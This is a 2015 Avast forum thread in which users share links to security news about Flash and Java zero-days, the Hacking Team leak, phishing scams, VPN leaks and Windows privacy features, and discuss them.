Funny thing is we get an IDS alert like: "ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related". (Surricata IDS alert example), and read about country risk status on Zulu Zscaler scans for China, Russia, Ukraine, while the by far biggest malware spreading nation on earth, the U.S. of A., is never even mentioned. How about some biased risk rating?
polonus
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
Here is the official press release (posted by malwarebytes.org)...
https://press.malwarebytes.org/2015/06/22/malwarebytes-acquires-junkware-removal-tool/?utm_source=blog&utm_medium=social
-
Popular Security Software Came Under Relentless NSA and GCHQ Attacks
https://firstlook.org/theintercept/2015/06/22/nsa-gchq-targeted-kaspersky/
NSA, GCHQ targeted Kaspersky, other cybersecurity companies – Snowden docs
http://rt.com/usa/268891-nsa-gchq-software-kaspersky/
-
Beyond Superfish: Turns out SSL-trashing spyware is widespread
https://gigaom.com/2015/02/23/beyond-superfish-turns-out-ssl-trashing-spyware-is-widespread/
One thing I noticed is this "quite a few software packages in the areas of antivirus and parental protection also use Komodia’s engine".
Hope Avast is not one of them? We all would be very appreciated if one of the Avast Team confirms this? Could one of the forum member report this, so one of the Avast team can take a look at this, read it, and investigate if Avast antivirus is affected by Komodia engine. Thanks!
-
Unpatched IE hole will not be patched by MS - circumventing ASLR-security,
demonstrated here: https://github.com/thezdi/abusing-silent-mitigations
Whitepaper on the mitigation attack: http://h30499.www3.hp.com/hpeb/attachments/hpeb/off-by-on-software-security-blog/599/1/WP-Hariri-Zuckerbraun-Gorenc-Abusing_Silent_Mitigations.pdf
polonus
-
Upate this optional MS update: https://support.microsoft.com/en-us/kb/3045645
to protect against a specific Banking Trojan that disables/hides UAC alerts.
polonus
-
The many enemies of Google - EU antitrust case: http://www.reuters.com/article/2015/04/27/us-eu-google-antitrust-idUSKBN0NF1YX20150427
Main Outer Category of complainants (19 in total) is formed by Microsoft, ICOMP, FairSearch, Beuc and The Open Internet Project.
Maybe the New Atlantic and International Trade Agreement will come in time so this antitrust case could/would never materialize, because it would overrule the outcome anyway.
polonus
-
Emergency Flash Player 18.0.0.194 update.
Adware free offline installers :
Active X : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe
NPAPI : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player.exe
PPAPI : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ppapi.exe
Greetz, Red.
-
Millions and millions of dollars lost through CryptoWall ransomware:
http://www.ic3.gov/media/2015/150623.aspx
Update your AV, use a firewall, use a decent ad-/pop-up-/script blocker and stay alert!
polonus
-
Registry Cleaners: Digital Snake Oil
https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social
Google Takes a Stand Against Revenge Porn
https://blog.malwarebytes.org/privacy-2/2015/06/google-takes-a-stand-against-revenge-porn/?utm_source=Gplus&utm_medium=social
-
Registry Cleaners: Digital Snake Oil
https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social)
It's always nice to get confirmation from a reputable place on something I've been preaching for many years. :)
-
Security researcher casually drops Adobe Reader, Windows critical vulnerability bomb
http://www.zdnet.com/article/security-researcher-casually-drops-adobe-reader-windows-critical-vulnerability-bomb/
-
216 million dollar damage causing HawkEye keylogger e-mail fraud alert: https://www.fsisac.com/sites/default/files/news/BEC_Joint_Product_Final.pdf
polonus
-
Navy signs $9.1 million contract with Microsoft to keep Windows XP afloat
www.winbeta.org/news/navy-signs-91-million-contract-microsoft-keep-windows-xp-afloat
-
Registry Cleaners: Digital Snake Oil
https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social)
It's always nice to get confirmation from a reputable place on something I've been preaching for many years. :)
I agree I have stopped messing with the registry cleaner even in CCleaner.
Once after I "cleaned" the registry in my Win7 I ended up having to restore what CCleaner cleaned.
Never again. Leave the registry alone.
If it ain't broke, don't fix it!
-
Fake Bank of America Twitter Feed Leads to Phishing Page
https://blog.malwarebytes.org/fraud-scam/2015/06/fake-bank-of-america-twitter-feed-leads-to-phishing-page/?utm_source=Gplus&utm_medium=social
Navy signs $9.1 million contract with Microsoft to keep Windows XP afloat
www.winbeta.org/news/navy-signs-91-million-contract-microsoft-keep-windows-xp-afloat
I wonder if this will affect all of the XP systems everywhere. ???
-
Samsung disabling Windows update, explained away as providing a choice: https://grahamcluley.com/2015/06/samsung-disabled-windows-update/
link article author = Graham Cluley
polonus
-
Samsung disabling Windows update, explained away as providing a choice: https://grahamcluley.com/2015/06/samsung-disabled-windows-update/
link article author = Graham Cluley
polonus
Some choice - there has always been a choice in the OS if the user wishes to disable windows update and there are the usual warnings of doing so.
When Samsung do this the user doesn't have a choice as they would be unaware that they had disabled WU. So they live in ignorance that their system is at potential risk from vulnerabilities being exploited.
-
Magento Platform Targeted By Credit Card Scrapers
https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
-
Greenpeace: bad Amazon - good Apple!
http://www.greenpeace.org/usa/Global/usa/planet3/PDFs/clickingclean.pdf
See attached
Don't see how this has anything to do with SECURITY WARNINGS & Notices, even more so nothing to do with these forums.
<off-topic>For me Greenpeace = Bad, if you don't fit their agenda your mad.</off-topic>
-
I also don't see a correlation of that chart to computer security ???
-
Hi bob3160 and DavidR,
That is why I have removed the posting on second thoughts. I found the article link on a Dutch security site (webworld).
Amazon has come under quite some "flak" lately (for bundling deals) and now also for the amount of CO2 that goes into the clicks they score ;D
polonus
-
To Save, or Not to Save, That is the Question
https://blog.malwarebytes.org/online-security/2015/06/to-save-or-not-to-save-that-is-the-question/?utm_source=Gplus&utm_medium=social
-
Microsoft silently added 18 root cetificates to Windows, according to: https://twitter.com/Hexatomium/status/614760398940708864
Silently performed in combination with Cisco: https://news.ycombinator.com/item?id=9789819
On this link I get a "your connection is not private" alert from Google: https://www.wilderssecurity.com/threads/rcc-check-your-systems-trusted-root-certificate-store.373819/
Background read: https://ma.ttias.be/the-broken-state-of-trust-in-root-certificates/
pol
-
Google's One Account for Everywhere is not a handy feature only as Google says, it is also an additional threat where attackers could have access everywhere!
When an attacker has a foothold on your desktop that now means also on all of your peripherals.
Read: http://www.prep-blog.com/2014/05/05/which-is-the-greater-threat-govt-or-corporate-intrusion/
polonus
-
Did you read this: http://dontbubble.us/?kad=en_US
When you visit the page and you see what my fingerprinting detection extension has to report;
CanvasFingerprintBlock
Blocked 800 potential HTML canvas fingerprinting attempts on this page
Prevented a script on http://dontbubble.us from capturing the point (1, 8) on the following 35px × 35px canvas:
Prevented a script on http://dontbubble.us from capturing the point (2, 8) on the following 35px × 35px canvas:
Prevented a script on http://dontbubble.us from capturing the point (3, 8) on the following 35px × 35px canvas:
Why the fingerprinting there?
polonus
-
Already asked attention for this on many occasions in the past, but many, many websites are insecure because of outdated and unpatched CMS like Word Press )plug-ins and themes, especially free versions). The situation for JQuery scripts might even be worse, many online website versions have not been altered or updated from the word go = instalation date. Here we see sheer incompetence of web admins and hosters alike and this is putting the average user at risk. How long polonus will still be a voice crying in the wilderness?
Example: https://forum.avast.com/index.php?topic=172901.0
polonus (volunteer website security analyst and website error-hunter)
-
New Exploitkit "Sundown" aims at user that has not updated Adobe Flash Player!
Adobe "the new Java" of our time!
Read: http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html
Analysis: https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BEP
Info credits go to: Aditya Sood en Rohit Bansal
polonus
When I clicked on the "Don't need coffee" website, my Avast piped up that it blocked a infection on that page.
-
Maybe the page exposed some of that code and Avast alerted that. There is no payload, so you are safe.
polonus
-
I'm suspecting code get exposed because a user like myself, does not run NoScript in their browser. Correct?
-
Arguably the best Anti-Virus for Windows is giving pirates a chance to turn into legit users for free
http://betanews.com/2015/06/28/arguably-the-best-anti-virus-for-windows-is-giving-pirates-a-chance-to-turn-into-legit-users-for-free/
http://venturebeat.com/2015/06/28/malwarebytes-offers-pirates-and-duped-customers-12-months-of-its-premium-antimalware-product-for-free/
-
Arguably the best Anti-Virus for Windows is giving pirates a chance to turn into legit users for free
http://betanews.com/2015/06/28/arguably-the-best-anti-virus-for-windows-is-giving-pirates-a-chance-to-turn-into-legit-users-for-free/
http://venturebeat.com/2015/06/28/malwarebytes-offers-pirates-and-duped-customers-12-months-of-its-premium-antimalware-product-for-free/
So this link post by Charyb is a bloody scam >:( :o https://forum.avast.com/index.php?topic=172326.0
Which I've already bought 1 license via PayPal for my father laptop which I've kept every record of my order, MAN! I'm bloody PI$$ED OFF and real MAD!
CHARYB Please EXPLAIN WHY!
-
Arguably the best Anti-Virus for Windows is giving pirates a chance to turn into legit users for free
http://betanews.com/2015/06/28/arguably-the-best-anti-virus-for-windows-is-giving-pirates-a-chance-to-turn-into-legit-users-for-free/
http://venturebeat.com/2015/06/28/malwarebytes-offers-pirates-and-duped-customers-12-months-of-its-premium-antimalware-product-for-free/
So this link post by Charyb is a bloody scam >:( :o https://forum.avast.com/index.php?topic=172326.0
Which I've already bought 1 license via PayPal for my father laptop which I've kept every record of my order, MAN! I'm bloody PI$$ED OFF and real MAD!
CHARYB Please EXPLAIN WHY!
Oh shit sorry about your loss. Sorry mate, I have no idea about that link you posted. What I can do for you is that I can go to Malwarebytes antimalware forum and mention that link that you have posted along with the 2 links that I have mentioned in my previous post and will check with them which ones is true and false.
-
@ Staticguy
You don't have to do anything. Malware Bytes is ware of this.
-
@ Staticguy
You don't have to do anything. Malware Bytes is ware of this.
@ Staticguy thanks I'm dealing with these issue at MBAM forum as I have to sit tight and wait until they fully investigate, this is my very first mistake for nearly 20 years behind a computer and I am totally a shame :-[
-
SSLv3 now dead: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/
link article author = Richard Chirgwin
polonus
-
Recent Flash Player 0-day Exploit Goes Mainstream
https://blog.malwarebytes.org/exploits-2/2015/06/recent-flash-player-0-day-exploit-goes-mainstream/?utm_source=Gplus&utm_medium=social
-
SSLv3 now dead: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/
link article author = Richard Chirgwin
polonus
Good thing SSL doesn't exist in Chrome.
-
@ Staticguy
You don't have to do anything. Malware Bytes is ware of this.
@ Staticguy thanks I'm dealing with these issue at MBAM forum as I have to sit tight and wait until they fully investigate, this is my very first mistake for nearly 20 years behind a computer and I am totally a shame :-[
Your welcome for helping you point to the right direction :). Everyone make mistakes mate even though they are a beginner or expert. Nobody is perfect. I too been there done that and lessons are learned. Hope now everything is ok at your end?
-
Hacked routers are spreading Dyre aka Dyreza banker trojan malware:
http://www.brycampbell.co.uk/new-blog/2015/6/24/compromised-airos-routers-being-used-by-dyre
link alert by author Bryan campbell.
An in-depth analysis of this malcode: http://christophe.rieunier.name/securite/Dridex/20150608_dropper/Dridex_dropper_analysis.php
link article author = christophe rieunier
polonus
-
Most internet anonymity software leaks users’ details -
VPN Services are secure is a myth!
Read: http://www.qmul.ac.uk/media/news/items/se/158459.html
Research paper: http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf
See survey attached.
polonus
-
Most internet anonymity software leaks users’ details -
VPN Services are secure is a myth!
Read: http://www.qmul.ac.uk/media/news/items/se/158459.html (http://www.qmul.ac.uk/media/news/items/se/158459.html)
Research paper: http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf (http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf)
See survey attached.
polonus
It's nice to see that Avast's SecureLine isn't on that list. :)
-
Most internet anonymity software leaks users’ details -
VPN Services are secure is a myth!
Read: http://www.qmul.ac.uk/media/news/items/se/158459.html (http://www.qmul.ac.uk/media/news/items/se/158459.html)
Research paper: http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf (http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf)
See survey attached.
polonus
It's nice to see that Avast's SecureLine isn't on that list. :)
I believe the absence of Avast SecureLine means that it wasn't part of the test as indicated by the subtitle of the attachment. It would have been "nicer" to see that it WAS on the list with a green "N" in each column. Since it apparently wasn't tested there's no way to know whether its absence is a good or bad thing.
-
You can test yourself here: https://ipleak.net/
dnsleaktest seems down - https://downornotworking.com/dnsleaktest.com/
polonus
Also read here: https://forum.avast.com/index.php?topic=123059.0
And a review here: http://www.expertreviews.co.uk/software/internet-security/1400543/avast-secureline-vpn-review
Mixed feelings expressed here: http://www.reddit.com/r/VPN/comments/1zgj84/avast_secureline_vpn/
Further measures to be taken by users (interesting): http://lifehacker.com/5902397/how-to-make-vpns-even-more-secure
pol
-
The NoScript extension in firefox can be circumvented via Google cloud and whitelisted by default googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass noscript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
-
The NoScript extension in firefox can be circumvented via Google cloud and whitelisted by default googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass noscript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
I wiped NoScript's default whitelist long ago. This is actually old news, since any whitelisted site (even by the user) can execute scripts and other content on the page.
Edit: Took my reply out of the quote. Sorry
-
The NoScript extension in firefox can be circumvented via Google cloud and whitelisted by default googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass noscript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
Generally I allow googleapis.com in noscript - But another blocking function could be to use RequestPolicy to specifically block *.googleapis if required.
-
Fake Twitter Verification Profile leads to Phishing, Credit Card Theft
https://blog.malwarebytes.org/fraud-scam/2015/06/fake-twitter-verification-profile-leads-to-phishing-credit-card-theft/?utm_source=Gplus&utm_medium=social
Driver Updaters: Digital Snake Oil, Part 2
https://blog.malwarebytes.org/social-engineering/2015/06/driver-updaters-digital-snake-oil-part-2/?utm_source=Gplus&utm_medium=social
WhatsApp Elegant Gold Hits the Digital Catwalk
https://blog.malwarebytes.org/fraud-scam/2015/07/whatsapp-elegant-gold-hits-the-digital-catwalk/?utm_source=Gplus&utm_medium=social
-
Not only snakeoil but snakeoil that normally comes free as free driver downloads on the Interwebs while these services come to charge you for similar driver downloads, an outright scam. Scammers always on the look-out to rip off an extra buck from the backs of the unaware and the meek. We won't be fooled again! (same goes for registry vacuum cleaners also added to PUP detection by MBAM, (good action, folks, good action).
pol
-
Driver Updaters: Digital Snake Oil, Part 2
https://blog.malwarebytes.org/social-engineering/2015/06/driver-updaters-digital-snake-oil-part-2/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/social-engineering/2015/06/driver-updaters-digital-snake-oil-part-2/?utm_source=Gplus&utm_medium=social)
Everything would seem to indicate that updating drivers should be a good thing, and there are several reputable driver updater programs in existence.[/font][/size]
The secret is in eliminating the crap and picking out a good one. :)
-
Hi bob3160,
The bad thing is the user has to fend for himself more and more now.
You are no longer protected, you are out on your own.
You have to block, you have to take the crap from downloads.
You have become both product and often also become a victim of cheap tricks.
How can you trust anything online as an unaware user finding yourself in such a situation,
Users are had big time when not from the one side then from the other.
It is a dangerous digital world out there and one is out on one's own.
Conclusion.
Good we have the Avast support forums to provide users with a bit of honest guidelines,
Here we still say - a man a man - a word a word - rare to be found nowadays a place to trust,
let cherish that, bob3160, let us cherish that. It is so rare these days.
polonus
P.S. Updating drivers is not always and under all circumstances a good thing or needed, it might sometimes add to your problems, forewarned is forearmed/.
D
-
Hi bob3160,
The bad thing is the user has to fend for himself more and more now.
You are no longer protected, you are out on your own.
You have to block, you have to take the crap from downloads.
You have become both product and often also become a victim of cheap tricks.
How can you trust anything online as an unaware user finding yourself in such a situation,
Users are had big time when not from the one side then from the other.
It is a dangerous digital world out there and one is out on one's own.
Conclusion.
Good we have the Avast support forums to provide users with a bit of honest guidelines,
Here we still say - a man a man - a word a word - rare to be found nowadays a place to trust,
let cherish that, bob3160, let us cherish that. It is so rare these days.
polonus
P.S. Updating drivers is not always and under all circumstances a good thing or needed, it might sometimes add to your problems, forewarned is forearmed/.
D
I've never had an outdated driver replaced with a newer signed driver that presented a problem.
Legitimate programs also don't request that you pay to update. You'll find a recommendation at:
https://forum.avast.com/index.php?topic=19387.msg1205358#msg1205358 (https://forum.avast.com/index.php?topic=19387.msg1205358#msg1205358)
(I don't allow it to run at system start. I start it manually when I want to check for updates; both program and driver updates.)
-
The NoScript extension in firefox can be circumvented via Google cloud and whitelisted by default googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass noscript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
Fixed in V2.6.9.29 :) -> https://noscript.net/changelog
-
Is your Google Chrome browser hooked into BeEF? Protect with Vegan, read: http://blog.cylance.com/vegan-chrome-extension-to-defeat-beef
polonus
-
You want to share Wifi access with all of your Outlook-, Skype - and Facebook contacts within reach of your local network access point?
You have second thoughts also, then read on.
Wifi Sense does just that and has been introduced for the first time as it sneaked into Windows Phone 8.1. and no-one reacted, but now that this feature comes to Windows 10 security experts make some really deep frowns. Windows stores your password encrypted in the cloud and then shares it with all your acquantances (contacts) within the reach of your local network. This feature is on by default and the user has to disable it actively (only for that particular device) For the network an adaptation of the SSID is necessary by adding the string "_optout". Security experts call the feature "a cheap hack" and a security breach of Wifi networking as such! Certainly a risk for the not so technically adept user. Modern OS gets more and more one way invasive and one has to go into technical trouble to get at the settings that one really prefers. It is almost like "we will decide what is good for you whether you share your access, whether we will show you personalised ads that are very difficult to block etc. etc. and all these "handy features whether you like it or not are slowly creeping in so young users do not know of an alrternative situation as where we came from to land here.
polonus
-
What about the risks when you combine this feature with an access risk at distance like ProxHam?
Why you have to combine the "_optout"-suffix MS thinks you should add to your SSID with Google's alternative "_nomap"-suffix Google comes up with. This knowing a SSID has only a maximum of 32 positions and only "_nodrive_optout" is almost half of that number? MS this is a very bad idea.
Don't these Redmond boys have a qualty validation department to keep such bad security features out?
Again MS is choosing user friendliness over a definite security risk? (info credits from a thread started by Anak Krakatau)
polonus
-
The Grey Side of Mobile Advertising
https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/?utm_source=Gplus&utm_medium=social
-
The Grey Side of Mobile Advertising
https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/?utm_source=Gplus&utm_medium=social
Something related to this was published before on Avast blog... If I'm not wrong...
-
Microsoft Moves to Kill Silverlight, Tells Everyone to Stop Using It
http://news.softpedia.com/news/microsoft-moves-to-kill-silverlight-tells-everyone-to-stop-using-it-485970.shtml
-
Microsoft Moves to Kill Silverlight, Tells Everyone to Stop Using It
http://news.softpedia.com/news/microsoft-moves-to-kill-silverlight-tells-everyone-to-stop-using-it-485970.shtml
And there was me thinking they never started to use it - another MS idea/solution looking for a problem to solve.
-
Plex has been hacked, so be sure to change your passwords
www.phandroid.com/2015/07/02/plex-hacked/
Plex blog https://blog.plex.tv/
-
Migrate now before it is too late: Deadline July 14th of 2015 MS does no longer support security patches for Server 2003. The best choice depending on circumstances is to migrate to Windows Server 2012 R2.
polonus
-
Facebook Phishing via Apps is Alive and Well
https://blog.malwarebytes.org/fraud-scam/2015/07/facebook-phishing-via-apps-is-alive-and-well/?utm_source=Gplus&utm_medium=social
-
Hi all,
i'm new to these forums, but decided to make an account because i noticed some alarming email addresses on my avast homepage. i have avast installed on 3 of my computers, and i notice the email address is different on each of my computers. they use suspicious addresses like "gmai.com" or "gamil.com". i'm pretty sure these are scam email addresses, but i'm wondering why they're appearing on my avast homepage. is anyone else experiencing this? and is this something i should be worried about?
-
Please don't post the same thing in several threads.
Your question was answered in the other thread.
https://forum.avast.com/index.php?topic=173195.msg1229946#msg1229946 (https://forum.avast.com/index.php?topic=173195.msg1229946#msg1229946)
-
Hi all,
i'm new to these forums, but decided to make an account because i noticed some alarming email addresses on my avast homepage. i have avast installed on 3 of my computers, and i notice the email address is different on each of my computers. they use suspicious addresses like "gmai.com" or "gamil.com". i'm pretty sure these are scam email addresses, but i'm wondering why they're appearing on my avast homepage. is anyone else experiencing this? and is this something i should be worried about?
This shouldn't be in this topic but one of its own, in the my.avast.com I see you have one in the General sub-forum, I will respond to that one.
-
Hackers hacked: Malware firm's data leaked, ties with regimes exposed
http://rt.com/news/271855-italian-hacker-firm-hacked/
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
-
Network security and website security needs technical IT to get us more secure.
Security specialist should better protect against a full range of security breaches (vulnerabilities, exploits, bugs), common attackers just need one workable tiny hole to worm through to be able to compromise a full network/website and do their evil deeds. Just had a discussion to-day with some technical IT people and they confirmed what I post here.
As I experience from my daily cold reconnaissance scanning the situation is that critical, that something needs to be done (education, secure coding, secure configuration etc. etc.). Protocols and platforms are introduced before they have been properly secured and are invariably rather insecure (virtual insecure code, features over security, user friendliness that creates security issues).
For instance we make the transition to https only while the configuration and settings are basically insecure - loads of website still with a log-in where log-in data go over the wire in plain txt, no security headers implemented.
polonus (volunteer website security analyst and website error-hunter)
-
Pre-patch announcement for Openssl: https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
Curious whether LibreSSL was more secure in these respects ;)
polonus
-
Pre-patch announcement for Openssl: https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
See Reply #3868... ;)
-
CS:GO Lottery Sites Under Attack From…Usernames and XSS?!
https://blog.malwarebytes.org/hacking-2/2015/07/csgo-lottery-sites-under-attack-from-usernames-and-xss/?utm_source=Gplus&utm_medium=social
Hacking Team Leak Exposes New Flash Player Zero Day
https://blog.malwarebytes.org/exploits-2/2015/07/hacking-team-leak-exposes-new-flash-zero-day/?utm_source=Gplus&utm_medium=social
Common Website Security Terminology Defined
https://blog.sucuri.net/2015/07/common-website-security-terminology-defined.html?utm_campaign=Website%20Security&utm_medium=social&utm_source=googleplus
10 Tips to Improve Your Website Security
https://blog.sucuri.net/2015/06/10-tips-to-improve-your-website-security.html?utm_campaign=Website%20Security&utm_medium=social&utm_source=linkedin
-
FBI seeks to re-start the 1990 crypto-warss: https://www.eff.org/deeplinks/2015/07/fbis-revival-crypto-wars-part-ii-continues-two-hearings-congress
If they succeed targets could wait for their next "birthday attack". ;D
polonus
O.K. And because of the Flash Player Zero Day it is better for users to disable Flash on computers!
-
PSA: Flash Zero-Day Now Active in The Wild
https://blog.malwarebytes.org/exploits-2/2015/07/neutrino-ek-leverages-latest-flash-0day/
Adobe to Patch Hacking Team’s Flash Zero-Day
http://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
-
Steam Keygen Video Leads to PUPs Galore
https://blog.malwarebytes.org/online-security/2015/07/steam-keygen-video-leads-to-pups-galore/?utm_source=Gplus&utm_medium=social
-
OPM hack may have affected 32 million government employees
www.marketwatch.com/story/opm-hack-may-have-affected-32-million-government-employees-2015-07-08
http://abcnews.go.com/US/exclusive-25-million-affected-opm-hack-sources/story?id=32332731
-
DirectRev Malvertising Uses Self Sufficient Flash 0Day
https://blog.malwarebytes.org/malvertising-2/2015/07/directrev-malvertising-uses-self-sufficient-flash-0day/?utm_source=Gplus&utm_medium=social
Hackers get hacked!
http://rt.com/news/271855-italian-hacker-firm-hacked/
-
Data 26,2 million Americans were stolen!
Data breaches in USA go on and on: https://www.opm.gov/cybersecurity/
Be vigilant: http://www.dhs.gov/how-do-i/report-cyber-incidents
polonus
-
A lot of ransomware can be easily detected and stopped: http://www.eurecom.fr/en/publication/4548/detail/cutting-the-gordian-knot-a-look-under-the-hood-of-ransomware-attacks
polonus
-
2nd unpatched 0day Adobe Flash exploit in the Hacking Team gate ;)
https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html
as bonus some details about Adobe Open Font Manager vulnerability from Hacking Team gate ;)
http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-at-the-open-type-font-manager-vulnerability-from-the-hacking-team-leak/
-
Another reason to disable or uninstall Java: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/ (vulnerability in Java 8 update 45).
polonus
-
OT:- Well I'm glad I've uninstall Java a very long time ago ;)
-
Malware-Guns For Hire
https://blog.malwarebytes.org/hacking-2/2015/07/hackingteam-malware-guns-for-hire/?utm_source=Gplus&utm_medium=social
-
In addition to mechanisms that help them evade detection by sandboxes and dynamic detection tools,
Kofer variants also include embellishments that attempt to fool malware researchers ...
http://www.infosecurity-magazine.com/news/ransomware-operation-kofer-mutates/
A Microsoft Office functionality that has been in use since the early 1990s can be exploited to deliver malicious, executable files to users ...
http://www.net-security.org/secworld.php?id=18596
http://seclists.org/bugtraq/2015/Jul/23
-
Fake “Microsoft Official Promotion” Email Offers £450,000 Prize
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-microsoft-official-promotion-email-offers-450000-prize/?utm_source=Gplus&utm_medium=social
-
Fake “Microsoft Official Promotion” Email Offers £450,000 Prize
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-microsoft-official-promotion-email-offers-450000-prize/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/fraud-scam/2015/07/fake-microsoft-official-promotion-email-offers-450000-prize/?utm_source=Gplus&utm_medium=social)
There are many Microsoft Email scams:
https://forum.avast.com/index.php?topic=81030.msg1212706#msg1212706 (https://forum.avast.com/index.php?topic=81030.msg1212706#msg1212706)
-
Mozilla Firefox deems all versions of adobe flash vulnerable and has blocked the plugin until the problem is fixed ! Currently I am using the latest version of course. 18.0.0.203
https://support.mozilla.org/en-US/kb/set-adobe-flash-click-play-firefox
-
Using Adobe Flash Player is a bad habit, like smoking:
http://blog.trendmicro.com/trendlabs-security-intelligence/the-adobe-flash-conundrum-old-habits-die-hard/
Firefox browser now blocks all versions: https://addons.mozilla.org/en-US/firefox/blocked/p946
polonus
-
Using Adobe Flash Player is a bad habit, like smoking:
And Drinking and a lot of other bad things..... :)
-
such things happen when Adobe fails to deliver fix to exploited vulnerability in-time ... ;D
anyway Adobe just released .209 build so let's wait till another exploit is abused ITW
-
PUP makers, Digital Snake Oil Part 3
https://blog.malwarebytes.org/social-engineering/2015/07/pup-makers-digital-snake-oil-part-3/?utm_source=Gplus&utm_medium=social
-
Adobe promises patch for latest wave of critical Hacking Team zero-day exploits
http://www.zdnet.com/article/adobe-promises-patch-for-latest-wave-of-critical-hacking-team-zero-day-exploits/
-
Java zero-day security flaw exploited in the wild
http://www.zdnet.com/article/java-zero-day-security-flaw-exploited-in-the-wild/
-
When you do not need Java, and you only cannot do without it on rare occasions, you better uninstall.
It is a never ending story of zero-days. Like the Janus gate in Rome, as Rome was allways at war somewhere, the gate was never closed (at peace time),so they made that gate a passthrough later.
polonus
-
More malvertising than ever before: http://www.invincea.com/2015/07/advanced-endpoint-threat-trend-highlights-june-2015-malvertising-gone-wild/
I hope users understand why they cannot go without a decent ad-blocker, I personally use uBlock Origin combined with Adguard and the general protection of Avast (account protection and shields) and Avast Online Security.
Google has a large specialist team to fight mal-ads, but still a lot of SEO Spam, criminal, scam and fraudulent ads slips through or is silently condoned. Use click-to-play for Flash content!
Blocking third party content with uMatriux in Google Chrome will help or work your firefox browser with NoScript and RequestPolicy extensions.
polonus
-
Microsoft Security Bulletin Summary for July 2015
https://technet.microsoft.com/library/security/ms15-jul
-
180 million users that stayed on XP now run serious risks as support for it ended!
MSRT does no longer function on XP. 12% of the users now out on an unsupported OS,
that is a scary situation and a danger also!
Re: http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Cybercriminals will have "a walk in the park" with XP!
polonus
-
180 million users that stayed on XP now run serious risks as support for it ended!
MSRT does no longer function on XP. 12% of the users now out on an unsupported OS,
that is a scary situation and a danger also!
Re: http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Cybercriminals will have "a walk in the park" with XP!
polonus
Sorry but this is more FUD from MS trying to kill it off and buy win10. This tune hasn't changes for the years leading up to and after XP support was ended and the world is still spinning.
There are some people that it doesn't matter what OS they use, they are likely to get hit because of unsafe practices and others who are unlikely to get hit because of their safe practices.
-
But there are others that find it hard to mitigate because lack of an alternative. Large department stores with XP driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
-
[You wanted an attacker to have admin rights, I think you won't!
Read why you'd better update:
https://technet.microsoft.com/en-us/library/security/2974294
polonus
-
But there are others that find it hard to mitigate because lack of an alternative. Large department stores with XP driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
